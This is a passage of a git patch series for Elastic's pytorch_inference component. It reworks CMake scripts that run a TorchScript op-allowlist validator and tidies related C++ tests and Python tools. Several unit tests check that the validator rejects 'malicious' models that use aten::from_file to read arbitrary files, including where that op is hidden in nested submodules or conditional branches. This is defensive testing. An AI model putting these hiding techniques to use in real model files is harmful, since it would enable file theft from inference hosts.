"${_venv_dir}/Scripts/pip.exe") +else() + set(_venv_python "${_venv_dir}/bin/python3") + set(_venv_pip "${_venv_dir}/bin/pip") +endif() + +# --- Create virtual environment if it does not exist --- +if(NOT EXISTS "${_venv_python}") + message(STATUS "Creating virtual environment in ${_venv_dir} ...") + execute_process( + COMMAND "${_python_path}" -m venv "${_venv_dir}" + RESULT_VARIABLE _venv_rc + ) + if(NOT _venv_rc EQUAL 0) + message(FATAL_ERROR "Failed to create virtual environment (exit ${_venv_rc})") + endif() +endif() + +# --- Install / update dependencies when requirements.txt is newer --- +set(_stamp "${_venv_dir}/.requirements.stamp") +set(_needs_install FALSE) + +if(NOT EXISTS "${_stamp}") + set(_needs_install TRUE) +else() + file(TIMESTAMP "${_requirements}" _req_ts "%Y%m%d%H%M%S" UTC) + file(TIMESTAMP "${_stamp}" _stamp_ts "%Y%m%d%H%M%S" UTC) + if(_req_ts STRGREATER _stamp_ts) + set(_needs_install TRUE) + endif() +endif() + +if(_needs_install) + message(STATUS "Installing/updating Python dependencies ...") + execute_process( + COMMAND "${_venv_pip}" install --quiet --upgrade pip + RESULT_VARIABLE _pip_rc + ) + if(NOT _pip_rc EQUAL 0) + message(WARNING "pip upgrade failed (exit ${_pip_rc}) — continuing anyway") + endif() + + execute_process( + COMMAND "${_venv_pip}" install --quiet -r "${_requirements}" + RESULT_VARIABLE _pip_rc + ) + if(NOT _pip_rc EQUAL 0) + message(FATAL_ERROR "Failed to install dependencies from ${_requirements} (exit ${_pip_rc})") + endif() + + file(WRITE "${_stamp}" "installed") +endif() + +# --- Ensure the venv's torch libraries take precedence --- +# When a locally-built libtorch is installed in a system path (e.g. +# /usr/local/lib on macOS), the pip-installed torch package's +# libtorch_python will pick up the wrong libtorch_cpu at load time. +# Prepending the venv's torch/lib directory to the dynamic library +# search path forces the pip-bundled libraries to be found first. +if(CMAKE_HOST_WIN32) + set(_venv_site_packages "${_venv_dir}/Lib/site-packages") +else() + # Discover the site-packages directory (Python version varies) + file(GLOB _venv_site_packages "${_venv_dir}/lib/python*/site-packages") +endif() +set(_torch_lib_dir "${_venv_site_packages}/torch/lib") + +if(EXISTS "${_torch_lib_dir}") + if(CMAKE_HOST_APPLE) + set(ENV{DYLD_LIBRARY_PATH} "${_torch_lib_dir}:$ENV{DYLD_LIBRARY_PATH}") + elseif(NOT CMAKE_HOST_WIN32) + set(ENV{LD_LIBRARY_PATH} "${_torch_lib_dir}:$ENV{LD_LIBRARY_PATH}") + endif() + message(STATUS "Prepended ${_torch_lib_dir} to dynamic library search path") +endif() + +# --- Build the command line for validate_allowlist.py --- +set(_cmd "${_venv_python}" "${_validate_script}") + +if(DEFINED VALIDATE_CONFIG) + list(APPEND _cmd "--config" "${VALIDATE_CONFIG}") +endif() + +if(DEFINED VALIDATE_PT_DIR) + list(APPEND _cmd "--pt-dir" "${VALIDATE_PT_DIR}") +endif() + +if(DEFINED VALIDATE_VERBOSE AND VALIDATE_VERBOSE) + list(APPEND _cmd "--verbose") +endif() + +message(STATUS "Running: ${_cmd}") + +execute_process( + COMMAND ${_cmd} + WORKING_DIRECTORY "${SOURCE_DIR}" + RESULT_VARIABLE _validate_rc +) + +if(NOT _validate_rc EQUAL 0) + message(FATAL_ERROR "Validation failed (exit ${_validate_rc})") +endif() diff --git a/dev-tools/extract_model_ops/README.md b/dev-tools/extract_model_ops/README.md index a7028d521..d223faee9 100644 --- a/dev-tools/extract_model_ops/README.md +++ b/dev-tools/extract_model_ops/README.md @@ -82,12 +82,20 @@ python3 validate_allowlist.py --verbose python3 validate_allowlist.py --config /path/to/models.json ``` -The script can also be run via CMake: +The script can also be run via the CMake `validate_pytorch_inference_models` +target, which automatically locates a Python 3 interpreter, creates a venv, +and installs dependencies — no manual setup required: ```bash cmake --build cmake-build-relwithdebinfo -t validate_pytorch_inference_models ``` +The CMake target searches for `python3`, `python3.12`, `python3.11`, +`python3.10`, `python3.9`, and `python` (in that order), accepting the +first one that reports Python 3.x. This handles Linux build machines +where Python is only available as `python3.12` (via `make altinstall`) +as well as Windows where the canonical name is `python`. + ## Configuration files | File | Used by | Purpose | diff --git a/dev-tools/extract_model_ops/run_validation.sh b/dev-tools/extract_model_ops/run_validation.sh deleted file mode 100755 index 29639b5ff..000000000 --- a/dev-tools/extract_model_ops/run_validation.sh +++ /dev/null @@ -1,40 +0,0 @@ -#!/bin/bash -# -# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one -# or more contributor license agreements. Licensed under the Elastic License -# 2.0 and the following additional limitation. Functionality enabled by the -# files subject to the Elastic License 2.0 may only be used in production when -# invoked by an Elasticsearch process with a license key installed that permits -# use of machine learning features. You may not use this file except in -# compliance with the Elastic License 2.0 and the foregoing additional -# limitation. -# -# Wrapper that ensures the Python virtual environment exists and then -# runs validate_allowlist.py. All arguments are forwarded to the script. - -set -euo pipefail - -SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)" -VENV_DIR="${SCRIPT_DIR}/.venv" -REQUIREMENTS="${SCRIPT_DIR}/requirements.txt" -VALIDATE_SCRIPT="${SCRIPT_DIR}/validate_allowlist.py" - -if ! command -v python3 &>/dev/null; then - echo "ERROR: python3 not found on PATH" >&2 - exit 1 -fi - -if [ ! -d "${VENV_DIR}" ]; then - echo "Creating virtual environment in ${VENV_DIR}..." >&2 - python3 -m venv "${VENV_DIR}" -fi - -if [ ! -f "${VENV_DIR}/.requirements.stamp" ] || \ - [ "${REQUIREMENTS}" -nt "${VENV_DIR}/.requirements.stamp" ]; then - echo "Installing/updating dependencies..." >&2 - "${VENV_DIR}/bin/pip" install --quiet --upgrade pip - "${VENV_DIR}/bin/pip" install --quiet -r "${REQUIREMENTS}" - touch "${VENV_DIR}/.requirements.stamp" -fi - -exec "${VENV_DIR}/bin/python3" "${VALIDATE_SCRIPT}" "$@" diff --git a/test/CMakeLists.txt b/test/CMakeLists.txt index b0798a2ea..a9006d0b3 100644 --- a/test/CMakeLists.txt +++ b/test/CMakeLists.txt @@ -70,18 +70,16 @@ add_custom_target(test_all_parallel # Python integration test: validate the pytorch_inference operation # allowlist against real HuggingFace models. This target is opt-in # (not part of the regular "test" target) because it requires network -# access to download models. The wrapper script automatically creates -# a Python venv and installs dependencies on first run. +# access to download models. The CMake script automatically locates +# a Python 3 interpreter, creates a venv, and installs dependencies. # See dev-tools/extract_model_ops/README.md for details. -set(_validate_wrapper ${CMAKE_SOURCE_DIR}/dev-tools/extract_model_ops/run_validation.sh) -set(_validate_config ${CMAKE_SOURCE_DIR}/dev-tools/extract_model_ops/validation_models.json) -set(_validate_pt_dir ${CMAKE_SOURCE_DIR}/dev-tools/extract_model_ops/es_it_models) - add_custom_target(validate_pytorch_inference_models - COMMAND ${_validate_wrapper} - --config ${_validate_config} - --pt-dir ${_validate_pt_dir} - --verbose + COMMAND ${CMAKE_COMMAND} + -DSOURCE_DIR=${CMAKE_SOURCE_DIR} + -DVALIDATE_CONFIG=${CMAKE_SOURCE_DIR}/dev-tools/extract_model_ops/validation_models.json + -DVALIDATE_PT_DIR=${CMAKE_SOURCE_DIR}/dev-tools/extract_model_ops/es_it_models + -DVALIDATE_VERBOSE=TRUE + -P ${CMAKE_SOURCE_DIR}/cmake/run-validation.cmake COMMENT "Validating pytorch_inference allowlist against HuggingFace models and ES integration test models" WORKING_DIRECTORY ${CMAKE_SOURCE_DIR} ) \ No newline at end of file From f0b269a22545b608db99625f0dce7d4feb2e39af Mon Sep 17 00:00:00 2001 From: Ed Savage Date: Mon, 2 Mar 2026 16:42:45 +1300 Subject: [PATCH 17/30] [ML] Wire pytorch_inference validation into primary test targets Add the Python allowlist validation as a step in test_all_parallel (used by CI) and precommit (used by developers). Both use OPTIONAL=TRUE so the validation is gracefully skipped with a warning when Python 3 is not available or pip cannot install dependencies (e.g. in Docker containers without network access). The standalone validate_pytorch_inference_models target remains a hard failure for explicit use. Made-with: Cursor --- cmake/functions.cmake | 7 +++++++ cmake/run-validation.cmake | 26 ++++++++++++++++++++++---- test/CMakeLists.txt | 28 ++++++++++++++++++---------- 3 files changed, 47 insertions(+), 14 deletions(-) diff --git a/cmake/functions.cmake b/cmake/functions.cmake index 3e7f5481e..3f8b62130 100644 --- a/cmake/functions.cmake +++ b/cmake/functions.cmake @@ -510,5 +510,12 @@ add_custom_target(check_style add_custom_target(precommit COMMENT "Running essential tasks prior to code commit" DEPENDS format test + COMMAND ${CMAKE_COMMAND} + -DSOURCE_DIR=${CMAKE_SOURCE_DIR} + -DVALIDATE_CONFIG=${CMAKE_SOURCE_DIR}/dev-tools/extract_model_ops/validation_models.json + -DVALIDATE_PT_DIR=${CMAKE_SOURCE_DIR}/dev-tools/extract_model_ops/es_it_models + -DVALIDATE_VERBOSE=TRUE + -DOPTIONAL=TRUE + -P ${CMAKE_SOURCE_DIR}/cmake/run-validation.cmake WORKING_DIRECTORY ${CMAKE_CURRENT_SOURCE_DIR} ) diff --git a/cmake/run-validation.cmake b/cmake/run-validation.cmake index cc4b66843..a7fcadf7a 100644 --- a/cmake/run-validation.cmake +++ b/cmake/run-validation.cmake @@ -20,6 +20,12 @@ # VALIDATE_CONFIG - path to validation_models.json # VALIDATE_PT_DIR - directory of .pt files to validate # VALIDATE_VERBOSE - if TRUE, pass --verbose to the script +# OPTIONAL - if TRUE, skip gracefully when Python 3 is not +# found or dependency installation fails (instead +# of failing the build). Intended for use when +# this script is invoked as part of a broader test +# target where the environment may not have Python +# or network access. cmake_minimum_required(VERSION 3.16) @@ -27,6 +33,16 @@ if(NOT DEFINED SOURCE_DIR) message(FATAL_ERROR "SOURCE_DIR must be defined") endif() +# Helper: emit a FATAL_ERROR or a WARNING+return depending on OPTIONAL. +macro(_validation_fail _msg) + if(DEFINED OPTIONAL AND OPTIONAL) + message(WARNING "Skipping validation: ${_msg}") + return() + else() + message(FATAL_ERROR "${_msg}") + endif() +endmacro() + set(_tools_dir "${SOURCE_DIR}/dev-tools/extract_model_ops") set(_venv_dir "${_tools_dir}/.venv") set(_requirements "${_tools_dir}/requirements.txt") @@ -66,7 +82,7 @@ foreach(_name ${_python_names}) endforeach() if(_python_exe STREQUAL "") - message(FATAL_ERROR + _validation_fail( "No Python 3 interpreter found on PATH.\n" "Searched for: ${_python_names}\n" "Install Python 3 or ensure it is on your PATH.") @@ -97,7 +113,7 @@ if(NOT EXISTS "${_venv_python}") RESULT_VARIABLE _venv_rc ) if(NOT _venv_rc EQUAL 0) - message(FATAL_ERROR "Failed to create virtual environment (exit ${_venv_rc})") + _validation_fail("Failed to create virtual environment (exit ${_venv_rc})") endif() endif() @@ -130,7 +146,9 @@ if(_needs_install) RESULT_VARIABLE _pip_rc ) if(NOT _pip_rc EQUAL 0) - message(FATAL_ERROR "Failed to install dependencies from ${_requirements} (exit ${_pip_rc})") + _validation_fail( + "Failed to install dependencies from ${_requirements} (exit ${_pip_rc}).\n" + "This may indicate no network access is available.") endif() file(WRITE "${_stamp}" "installed") @@ -183,5 +201,5 @@ execute_process( ) if(NOT _validate_rc EQUAL 0) - message(FATAL_ERROR "Validation failed (exit ${_validate_rc})") + _validation_fail("Validation failed (exit ${_validate_rc})") endif() diff --git a/test/CMakeLists.txt b/test/CMakeLists.txt index a9006d0b3..0c501dfe5 100644 --- a/test/CMakeLists.txt +++ b/test/CMakeLists.txt @@ -57,6 +57,14 @@ else() set(_build_type_arg "") endif() +# Common arguments for the pytorch_inference allowlist validation script. +set(_validation_args + -DSOURCE_DIR=${CMAKE_SOURCE_DIR} + -DVALIDATE_CONFIG=${CMAKE_SOURCE_DIR}/dev-tools/extract_model_ops/validation_models.json + -DVALIDATE_PT_DIR=${CMAKE_SOURCE_DIR}/dev-tools/extract_model_ops/es_it_models + -DVALIDATE_VERBOSE=TRUE +) + add_custom_target(test_all_parallel DEPENDS build_tests COMMAND ${CMAKE_COMMAND} @@ -64,21 +72,21 @@ add_custom_target(test_all_parallel -DBUILD_DIR=${CMAKE_BINARY_DIR} ${_build_type_arg} -P ${CMAKE_SOURCE_DIR}/cmake/run-all-tests-parallel.cmake + COMMAND ${CMAKE_COMMAND} + ${_validation_args} + -DOPTIONAL=TRUE + -P ${CMAKE_SOURCE_DIR}/cmake/run-validation.cmake WORKING_DIRECTORY ${CMAKE_SOURCE_DIR} ) -# Python integration test: validate the pytorch_inference operation -# allowlist against real HuggingFace models. This target is opt-in -# (not part of the regular "test" target) because it requires network -# access to download models. The CMake script automatically locates -# a Python 3 interpreter, creates a venv, and installs dependencies. -# See dev-tools/extract_model_ops/README.md for details. +# Standalone target for the pytorch_inference allowlist validation. +# Unlike the invocation inside test_all_parallel (which uses OPTIONAL=TRUE +# to skip gracefully when Python or network access is unavailable), this +# target treats failures as hard errors — use it to explicitly verify the +# allowlist. See dev-tools/extract_model_ops/README.md for details. add_custom_target(validate_pytorch_inference_models COMMAND ${CMAKE_COMMAND} - -DSOURCE_DIR=${CMAKE_SOURCE_DIR} - -DVALIDATE_CONFIG=${CMAKE_SOURCE_DIR}/dev-tools/extract_model_ops/validation_models.json - -DVALIDATE_PT_DIR=${CMAKE_SOURCE_DIR}/dev-tools/extract_model_ops/es_it_models - -DVALIDATE_VERBOSE=TRUE + ${_validation_args} -P ${CMAKE_SOURCE_DIR}/cmake/run-validation.cmake COMMENT "Validating pytorch_inference allowlist against HuggingFace models and ES integration test models" WORKING_DIRECTORY ${CMAKE_SOURCE_DIR} From 5ffe729fc4680373a448947991ed2de5dc31ec1c Mon Sep 17 00:00:00 2001 From: Ed Savage Date: Tue, 3 Mar 2026 10:37:26 +1300 Subject: [PATCH 18/30] [ML] Fix clang-format in CModelGraphValidatorTest Made-with: Cursor --- .../unittest/CModelGraphValidatorTest.cc | 26 +++++++------------ 1 file changed, 10 insertions(+), 16 deletions(-) diff --git a/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc b/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc index 6e50adfac..8c115ad2b 100644 --- a/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc +++ b/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc @@ -326,20 +326,19 @@ BOOST_AUTO_TEST_CASE(testModuleWithSubmoduleInlines) { namespace { bool hasForbiddenOp(const CModelGraphValidator::SResult& result, const std::string& op) { - return std::find(result.s_ForbiddenOps.begin(), - result.s_ForbiddenOps.end(), op) != result.s_ForbiddenOps.end(); + return std::find(result.s_ForbiddenOps.begin(), result.s_ForbiddenOps.end(), + op) != result.s_ForbiddenOps.end(); } bool hasUnrecognisedOp(const CModelGraphValidator::SResult& result, const std::string& op) { - return std::find(result.s_UnrecognisedOps.begin(), - result.s_UnrecognisedOps.end(), op) != result.s_UnrecognisedOps.end(); + return std::find(result.s_UnrecognisedOps.begin(), result.s_UnrecognisedOps.end(), + op) != result.s_UnrecognisedOps.end(); } } BOOST_AUTO_TEST_CASE(testMaliciousFileReader) { // A model that uses aten::from_file to read arbitrary files. - auto module = ::torch::jit::load( - "testfiles/malicious_models/malicious_file_reader.pt"); + auto module = ::torch::jit::load("testfiles/malicious_models/malicious_file_reader.pt"); auto result = CModelGraphValidator::validate(module); BOOST_REQUIRE(result.s_IsValid == false); @@ -349,8 +348,7 @@ BOOST_AUTO_TEST_CASE(testMaliciousFileReader) { BOOST_AUTO_TEST_CASE(testMaliciousMixedFileReader) { // A model that mixes allowed ops (aten::add) with a forbidden // aten::from_file. The entire model must be rejected. - auto module = ::torch::jit::load( - "testfiles/malicious_models/malicious_mixed_file_reader.pt"); + auto module = ::torch::jit::load("testfiles/malicious_models/malicious_mixed_file_reader.pt"); auto result = CModelGraphValidator::validate(module); BOOST_REQUIRE(result.s_IsValid == false); @@ -361,8 +359,7 @@ BOOST_AUTO_TEST_CASE(testMaliciousMixedFileReader) { BOOST_AUTO_TEST_CASE(testMaliciousHiddenInSubmodule) { // Unrecognised ops buried three levels deep in nested submodules. // The validator must inline through all submodules to find them. - auto module = ::torch::jit::load( - "testfiles/malicious_models/malicious_hidden_in_submodule.pt"); + auto module = ::torch::jit::load("testfiles/malicious_models/malicious_hidden_in_submodule.pt"); auto result = CModelGraphValidator::validate(module); BOOST_REQUIRE(result.s_IsValid == false); @@ -373,8 +370,7 @@ BOOST_AUTO_TEST_CASE(testMaliciousHiddenInSubmodule) { BOOST_AUTO_TEST_CASE(testMaliciousConditionalBranch) { // An unrecognised op hidden inside a conditional branch. The // validator must recurse into prim::If blocks to detect it. - auto module = ::torch::jit::load( - "testfiles/malicious_models/malicious_conditional.pt"); + auto module = ::torch::jit::load("testfiles/malicious_models/malicious_conditional.pt"); auto result = CModelGraphValidator::validate(module); BOOST_REQUIRE(result.s_IsValid == false); @@ -383,8 +379,7 @@ BOOST_AUTO_TEST_CASE(testMaliciousConditionalBranch) { BOOST_AUTO_TEST_CASE(testMaliciousManyUnrecognisedOps) { // A model using many different unrecognised ops (sin, cos, tan, exp). - auto module = ::torch::jit::load( - "testfiles/malicious_models/malicious_many_unrecognised.pt"); + auto module = ::torch::jit::load("testfiles/malicious_models/malicious_many_unrecognised.pt"); auto result = CModelGraphValidator::validate(module); BOOST_REQUIRE(result.s_IsValid == false); @@ -399,8 +394,7 @@ BOOST_AUTO_TEST_CASE(testMaliciousManyUnrecognisedOps) { BOOST_AUTO_TEST_CASE(testMaliciousFileReaderInSubmodule) { // The forbidden aten::from_file is hidden inside a submodule. // After inlining, the validator must still detect it. - auto module = ::torch::jit::load( - "testfiles/malicious_models/malicious_file_reader_in_submodule.pt"); + auto module = ::torch::jit::load("testfiles/malicious_models/malicious_file_reader_in_submodule.pt"); auto result = CModelGraphValidator::validate(module); BOOST_REQUIRE(result.s_IsValid == false); From b00638df8084c2beef5693a52294e39656ebdd0c Mon Sep 17 00:00:00 2001 From: Ed Savage Date: Tue, 3 Mar 2026 14:44:04 +1300 Subject: [PATCH 19/30] [ML] Simplify Python discovery in run-validation.cmake using find_program Made-with: Cursor --- cmake/run-validation.cmake | 51 ++++++++++++-------------------------- 1 file changed, 16 insertions(+), 35 deletions(-) diff --git a/cmake/run-validation.cmake b/cmake/run-validation.cmake index a7fcadf7a..f1197eb19 100644 --- a/cmake/run-validation.cmake +++ b/cmake/run-validation.cmake @@ -52,49 +52,30 @@ set(_validate_script "${_tools_dir}/validate_allowlist.py") # Try names in order of preference. On Linux build machines Python may # only be available as python3.12 (installed via make altinstall). # On Windows the canonical name is just "python". -set(_python_names - python3 - python3.12 - python3.11 - python3.10 - python3.9 - python +find_program(_python_path + NAMES python3 python3.12 python3.11 python3.10 python3.9 python + DOC "Python 3 interpreter" ) -set(_python_exe "") -foreach(_name ${_python_names}) - execute_process( - COMMAND ${_name} --version - OUTPUT_VARIABLE _py_version_out - ERROR_VARIABLE _py_version_out - RESULT_VARIABLE _py_rc - OUTPUT_STRIP_TRAILING_WHITESPACE - ) - if(_py_rc EQUAL 0) - # Verify it is actually Python 3 - string(REGEX MATCH "Python 3\\." _is_py3 "${_py_version_out}") - if(_is_py3) - set(_python_exe "${_name}") - message(STATUS "Found Python 3: ${_name} (${_py_version_out})") - break() - endif() - endif() -endforeach() - -if(_python_exe STREQUAL "") +if(NOT _python_path) _validation_fail( "No Python 3 interpreter found on PATH.\n" - "Searched for: ${_python_names}\n" "Install Python 3 or ensure it is on your PATH.") endif() -# Resolve the full path so venv creation and pip invocations are unambiguous. -find_program(_python_path "${_python_exe}") -if(NOT _python_path) - # find_program failed but the execute_process above succeeded — fall back - # to the bare name (it will still work via PATH lookup). - set(_python_path "${_python_exe}") +# Verify it is actually Python 3 (guards against "python" being Python 2). +execute_process( + COMMAND "${_python_path}" --version + OUTPUT_VARIABLE _py_version_out + ERROR_VARIABLE _py_version_out + RESULT_VARIABLE _py_rc + OUTPUT_STRIP_TRAILING_WHITESPACE +) +if(NOT _py_rc EQUAL 0 OR NOT _py_version_out MATCHES "Python 3\\.") + _validation_fail( + "Found ${_python_path} but it is not Python 3 (${_py_version_out}).") endif() +message(STATUS "Found Python 3: ${_python_path} (${_py_version_out})") # --- Platform-specific venv paths --- if(CMAKE_HOST_WIN32) From c1c6eb411d52e78034360d21bc1f5adc9973442c Mon Sep 17 00:00:00 2001 From: Ed Savage Date: Tue, 3 Mar 2026 15:13:28 +1300 Subject: [PATCH 20/30] [ML] Use angle-bracket includes in pytorch_inference tests Replace relative "../Foo.h" includes with by adding the parent source directory to the test target's include path. Also remove unnecessary backslash escapes in extract_model_ops README. Made-with: Cursor --- bin/pytorch_inference/unittest/CCommandParserTest.cc | 2 +- bin/pytorch_inference/unittest/CMakeLists.txt | 2 ++ bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc | 4 ++-- bin/pytorch_inference/unittest/CResultWriterTest.cc | 4 ++-- bin/pytorch_inference/unittest/CThreadSettingsTest.cc | 2 +- dev-tools/extract_model_ops/README.md | 4 ++-- 6 files changed, 10 insertions(+), 8 deletions(-) diff --git a/bin/pytorch_inference/unittest/CCommandParserTest.cc b/bin/pytorch_inference/unittest/CCommandParserTest.cc index 7dcf6a7ef..5c7e7e4fd 100644 --- a/bin/pytorch_inference/unittest/CCommandParserTest.cc +++ b/bin/pytorch_inference/unittest/CCommandParserTest.cc @@ -9,7 +9,7 @@ * limitation. */ -#include "../CCommandParser.h" +#include #include diff --git a/bin/pytorch_inference/unittest/CMakeLists.txt b/bin/pytorch_inference/unittest/CMakeLists.txt index a2e0129c3..fe3c544a5 100644 --- a/bin/pytorch_inference/unittest/CMakeLists.txt +++ b/bin/pytorch_inference/unittest/CMakeLists.txt @@ -34,3 +34,5 @@ set(ML_LINK_LIBRARIES ) ml_add_test_executable(pytorch_inference ${SRCS}) + +target_include_directories(ml_test_pytorch_inference PRIVATE ${CMAKE_CURRENT_SOURCE_DIR}/..) diff --git a/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc b/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc index 8c115ad2b..595509ee0 100644 --- a/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc +++ b/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc @@ -9,9 +9,9 @@ * limitation. */ -#include "../CModelGraphValidator.h" +#include -#include "../CSupportedOperations.h" +#include #include diff --git a/bin/pytorch_inference/unittest/CResultWriterTest.cc b/bin/pytorch_inference/unittest/CResultWriterTest.cc index 97b99038a..7803bbc39 100644 --- a/bin/pytorch_inference/unittest/CResultWriterTest.cc +++ b/bin/pytorch_inference/unittest/CResultWriterTest.cc @@ -9,9 +9,9 @@ * limitation. */ -#include "../CResultWriter.h" +#include -#include "../CThreadSettings.h" +#include #include #include diff --git a/bin/pytorch_inference/unittest/CThreadSettingsTest.cc b/bin/pytorch_inference/unittest/CThreadSettingsTest.cc index 8ab8d03d2..759affb02 100644 --- a/bin/pytorch_inference/unittest/CThreadSettingsTest.cc +++ b/bin/pytorch_inference/unittest/CThreadSettingsTest.cc @@ -9,7 +9,7 @@ * limitation. */ -#include "../CThreadSettings.h" +#include #include diff --git a/dev-tools/extract_model_ops/README.md b/dev-tools/extract_model_ops/README.md index d223faee9..ff7530bc2 100644 --- a/dev-tools/extract_model_ops/README.md +++ b/dev-tools/extract_model_ops/README.md @@ -1,4 +1,4 @@ -# extract\_model\_ops +# extract_model_ops Developer tools for maintaining and validating the TorchScript operation allowlist in `bin/pytorch_inference/CSupportedOperations.cc`. @@ -27,7 +27,7 @@ If any of the reference models are gated, set a HuggingFace token: export HF_TOKEN="hf_..." ``` -## extract\_model\_ops.py +## extract_model_ops.py Traces each model in `reference_models.json`, collects the TorchScript operations from the inlined forward graph, and outputs the union as a From 61322edd118817503df374f2fbe7ee8eae0f32d7 Mon Sep 17 00:00:00 2001 From: Ed Savage Date: Tue, 3 Mar 2026 15:30:53 +1300 Subject: [PATCH 21/30] [ML] Remove stale extract_model_ops.py superseded by subdirectory version Made-with: Cursor --- dev-tools/extract_model_ops.py | 145 --------------------------------- 1 file changed, 145 deletions(-) delete mode 100755 dev-tools/extract_model_ops.py diff --git a/dev-tools/extract_model_ops.py b/dev-tools/extract_model_ops.py deleted file mode 100755 index 361c8d26a..000000000 --- a/dev-tools/extract_model_ops.py +++ /dev/null @@ -1,145 +0,0 @@ -#!/usr/bin/env python3 -# -# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one -# or more contributor license agreements. Licensed under the Elastic License -# 2.0 and the following additional limitation. Functionality enabled by the -# files subject to the Elastic License 2.0 may only be used in production when -# invoked by an Elasticsearch process with a license key installed that permits -# use of machine learning features. You may not use this file except in -# compliance with the Elastic License 2.0 and the foregoing additional -# limitation. -# -"""Extract TorchScript operation sets from supported HuggingFace transformer architectures. - -This developer tool traces/scripts reference models and collects the set of -TorchScript operations that appear in their forward() computation graphs. -The output is a sorted, de-duplicated union of all operations which can be -used to build the C++ allowlist in CSupportedOperations.h. - -Usage: - python3 dev-tools/extract_model_ops.py [--per-model] [--cpp] - -Flags: - --per-model Print the op set for each model individually. - --cpp Print the union as a C++ initializer list. -""" - -import argparse -import os -import sys -from collections import defaultdict - -import torch -from transformers import AutoConfig, AutoModel, AutoTokenizer - - -REFERENCE_MODELS = { - "bert": "bert-base-uncased", - "roberta": "roberta-base", - "distilbert": "distilbert-base-uncased", - "electra": "google/electra-small-discriminator", - "mpnet": "microsoft/mpnet-base", - "deberta": "microsoft/deberta-base", - "bart": "facebook/bart-base", - "dpr": "facebook/dpr-ctx_encoder-single-nq-base", - "mobilebert": "google/mobilebert-uncased", - "xlm-roberta": "xlm-roberta-base", -} - - -def collect_graph_ops(graph): - """Collect all operation names from a TorchScript graph, including blocks.""" - ops = set() - for node in graph.nodes(): - ops.add(node.kind()) - for block in node.blocks(): - ops.update(collect_graph_ops(block)) - return ops - - -def collect_all_module_ops(module): - """Collect all ops by inlining method calls and walking the flattened graph.""" - forward = module.forward - graph = forward.graph.copy() - torch._C._jit_pass_inline(graph) - return collect_graph_ops(graph) - - -def extract_ops_for_model(model_name: str) -> set[str]: - """Trace a HuggingFace model and return its TorchScript op set.""" - print(f" Loading {model_name}...", file=sys.stderr) - token = os.environ.get("HF_TOKEN") - tokenizer = AutoTokenizer.from_pretrained(model_name, token=token) - config = AutoConfig.from_pretrained(model_name, torchscript=True, token=token) - model = AutoModel.from_pretrained(model_name, config=config, token=token) - model.eval() - - inputs = tokenizer("This is a sample input for graph extraction.", - return_tensors="pt", padding="max_length", - max_length=32, truncation=True) - - input_ids = inputs["input_ids"] - attention_mask = inputs["attention_mask"] - - try: - traced = torch.jit.trace(model, (input_ids, attention_mask), strict=False) - except Exception as e: - print(f" Warning: trace failed for {model_name}: {e}", file=sys.stderr) - print(f" Falling back to torch.jit.script...", file=sys.stderr) - try: - traced = torch.jit.script(model) - except Exception as e2: - print(f" Error: script also failed for {model_name}: {e2}", file=sys.stderr) - return set() - - return collect_all_module_ops(traced) - - -def format_cpp_initializer(ops: set[str]) -> str: - """Format the op set as a C++ initializer list for std::unordered_set.""" - sorted_ops = sorted(ops) - lines = [] - for op in sorted_ops: - lines.append(f' "{op}"sv,') - return "{\n" + "\n".join(lines) + "\n}" - - -def main(): - parser = argparse.ArgumentParser(description=__doc__) - parser.add_argument("--per-model", action="store_true", - help="Print per-model op sets") - parser.add_argument("--cpp", action="store_true", - help="Print union as C++ initializer") - args = parser.parse_args() - - per_model_ops = {} - union_ops = set() - - print("Extracting TorchScript ops from supported architectures...", - file=sys.stderr) - - for arch, model_name in REFERENCE_MODELS.items(): - ops = extract_ops_for_model(model_name) - per_model_ops[arch] = ops - union_ops.update(ops) - print(f" {arch}: {len(ops)} ops", file=sys.stderr) - - print(f"\nTotal union: {len(union_ops)} unique ops", file=sys.stderr) - - if args.per_model: - for arch, ops in sorted(per_model_ops.items()): - print(f"\n=== {arch} ({REFERENCE_MODELS[arch]}) ===") - for op in sorted(ops): - print(f" {op}") - - if args.cpp: - print("\n// C++ initializer for SUPPORTED_OPERATIONS:") - print(format_cpp_initializer(union_ops)) - else: - print("\n// Sorted union of all operations:") - for op in sorted(union_ops): - print(op) - - -if __name__ == "__main__": - main() From 26f0235b80601737d6cddb3bf8083c593734150b Mon Sep 17 00:00:00 2001 From: Ed Savage Date: Tue, 3 Mar 2026 15:37:56 +1300 Subject: [PATCH 22/30] [ML] Extract shared TorchScript utilities into torchscript_utils.py Deduplicate collect_graph_ops, graph inlining, and HuggingFace model loading/tracing logic shared between extract_model_ops.py and validate_allowlist.py into a common module. Made-with: Cursor --- .../extract_model_ops/extract_model_ops.py | 55 +------------- .../extract_model_ops/torchscript_utils.py | 74 +++++++++++++++++++ .../extract_model_ops/validate_allowlist.py | 70 +++--------------- 3 files changed, 88 insertions(+), 111 deletions(-) create mode 100644 dev-tools/extract_model_ops/torchscript_utils.py diff --git a/dev-tools/extract_model_ops/extract_model_ops.py b/dev-tools/extract_model_ops/extract_model_ops.py index 46a97351b..ea56cee68 100644 --- a/dev-tools/extract_model_ops/extract_model_ops.py +++ b/dev-tools/extract_model_ops/extract_model_ops.py @@ -28,12 +28,10 @@ import argparse import json -import os import sys from pathlib import Path -import torch -from transformers import AutoConfig, AutoModel, AutoTokenizer +from torchscript_utils import collect_inlined_ops, load_and_trace_hf_model SCRIPT_DIR = Path(__file__).resolve().parent DEFAULT_CONFIG = SCRIPT_DIR / "reference_models.json" @@ -45,61 +43,16 @@ def load_reference_models(config_path: Path) -> dict[str, str]: return json.load(f) -def collect_graph_ops(graph): - """Collect all operation names from a TorchScript graph, including blocks.""" - ops = set() - for node in graph.nodes(): - ops.add(node.kind()) - for block in node.blocks(): - ops.update(collect_graph_ops(block)) - return ops - - -def collect_all_module_ops(module): - """Collect all ops by inlining method calls and walking the flattened graph.""" - forward = module.forward - graph = forward.graph.copy() - torch._C._jit_pass_inline(graph) - return 